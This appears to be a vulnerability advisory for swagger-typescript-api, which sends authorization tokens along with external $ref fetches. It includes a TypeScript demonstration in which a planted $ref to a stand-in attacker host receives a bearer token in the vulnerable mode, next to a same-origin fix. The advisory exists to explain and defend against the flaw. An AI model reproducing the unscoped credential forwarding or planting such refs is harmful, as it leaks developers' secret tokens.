swagger-typescript-api is vulnerable to Exposure of Sensitive Information
74
High Risk
swagger-typescript-api resolves external $ref URLs in OpenAPI specifications during code generation and forwards the configured authorization token on every such request, with no same-origin check, host allowlist, or cross-origin scope-down. When a developer supplies credentials to fetch a private spec, a malicious or compromised spec can contain a $ref pointing at an attacker-controlled URL, and the generator will send those credentials along with the request for it. This exfiltrates high-value secrets such as bearer tokens, personal access tokens, or API keys to the attacker. The fix forwards the authorization token only to remote $ref URLs that share the origin of the spec the credentials were supplied for, and blocks cross-origin credential forwarding.
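The scope-down described above, as an added example written for this page rather than swagger-typescript-api's own code: a small $ref resolver that can run in the vulnerable mode (token on every external request) or the hardened mode (token only to same-origin URLs). The function names (collectExternalRefs, shouldForwardAuth, resolveExternalRefs, tokenRecipients), the spec URL and hostnames, and the sample spec are all constructed for the illustration; no network request is made, the fetch stand-in only records what would have been sent.

```typescript
// Added example, not swagger-typescript-api's own code. All names below are
// hypothetical; the spec and hosts are constructed for the illustration.

type HeaderMap = Record<string, string>;

// A recorded outbound request: what the resolver would have sent.
interface RecordedRequest { url: string; headers: HeaderMap }

// Stand-in for fetch(): the caller decides what to do with each request.
type FetchLike = (url: string, headers: HeaderMap) => void;

// Walk a parsed OpenAPI document and return every $ref that points outside
// the document (anything not starting with '#'), resolved against specUrl so
// relative refs such as "./schemas/order.yaml" become absolute URLs.
function collectExternalRefs(doc: unknown, specUrl: string): string[] {
  const refs: string[] = [];
  const walk = (node: unknown): void => {
    if (Array.isArray(node)) { node.forEach(walk); return; }
    if (node === null || typeof node !== "object") return;
    for (const [key, value] of Object.entries(node as Record<string, unknown>)) {
      if (key === "$ref" && typeof value === "string" && !value.startsWith("#")) {
        refs.push(new URL(value, specUrl).href);
      } else {
        walk(value);
      }
    }
  };
  walk(doc);
  return refs;
}

// Same-origin check: scheme, host and port of the ref must equal those of the
// spec the credentials were supplied for. A different host, a different port,
// an https->http downgrade or an unparsable URL all get no credentials.
function shouldForwardAuth(specUrl: string, refUrl: string): boolean {
  try {
    const spec = new URL(specUrl);
    const ref = new URL(refUrl);
    if (spec.protocol !== "https:" && spec.protocol !== "http:") return false;
    return spec.origin === ref.origin;
  } catch {
    return false;
  }
}

// Resolve every external $ref. scopeDown=false reproduces the vulnerable
// behaviour (token on every request); scopeDown=true attaches the token only
// where shouldForwardAuth allows it.
function resolveExternalRefs(
  doc: unknown, specUrl: string, token: string,
  fetchImpl: FetchLike, scopeDown: boolean,
): RecordedRequest[] {
  const sent: RecordedRequest[] = [];
  for (const url of collectExternalRefs(doc, specUrl)) {
    const headers: HeaderMap = { Accept: "application/yaml, application/json" };
    if (!scopeDown || shouldForwardAuth(specUrl, url)) {
      headers.Authorization = `Bearer ${token}`;
    }
    sent.push({ url, headers });
    fetchImpl(url, headers);
  }
  return sent;
}

// Constructed private spec: one same-origin ref, one relative ref, one local
// ref, and one ref to an attacker-controlled host planted in the spec.
const SAMPLE_SPEC_URL = "https://api.example.internal/openapi.yaml";
const SAMPLE_SPEC = {
  openapi: "3.0.0",
  paths: {
    "/users": { get: { responses: { "200": { content: { "application/json": {
      schema: { $ref: "https://api.example.internal/schemas/user.yaml" } } } } } } },
    "/orders": { get: { responses: { "200": { content: { "application/json": {
      schema: { $ref: "./schemas/order.yaml" } } } } } } },
  },
  components: { schemas: {
    Local: { $ref: "#/components/schemas/Other" },
    Planted: { $ref: "https://attacker.example/collect.yaml" },
  } },
};

// Hosts that would receive the token under the chosen mode.
function tokenRecipients(scopeDown: boolean): string[] {
  const recordOnly: FetchLike = () => { /* no network: requests are only recorded */ };
  const sent = resolveExternalRefs(SAMPLE_SPEC, SAMPLE_SPEC_URL, "pat_constructed", recordOnly, scopeDown);
  return sent.filter(r => "Authorization" in r.headers).map(r => new URL(r.url).host);
}

console.log("vulnerable:", tokenRecipients(false)); // attacker.example is included
console.log("hardened:  ", tokenRecipients(true));  // only api.example.internal
```

Two caveats for anyone relying on a check like this. First, origin equality is the minimum: it stops the attacker-host case but still lets a spec steer the token to any path on the same origin, so the spec itself has to come from a source you trust. Second, if a generator run with credentials has already processed a spec from an origin you do not control, treat the token as exposed and rotate it; the upgrade prevents future leaks but does not undo a past one.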
You are affected if you are using a version that falls within the vulnerable range.
swagger-typescript-api is vulnerable to Exposure of Sensitive Information in versions 0.0.1 - 13.12.1.
Upgrade swagger-typescript-api to a patched version, that is, one later than 13.12.1.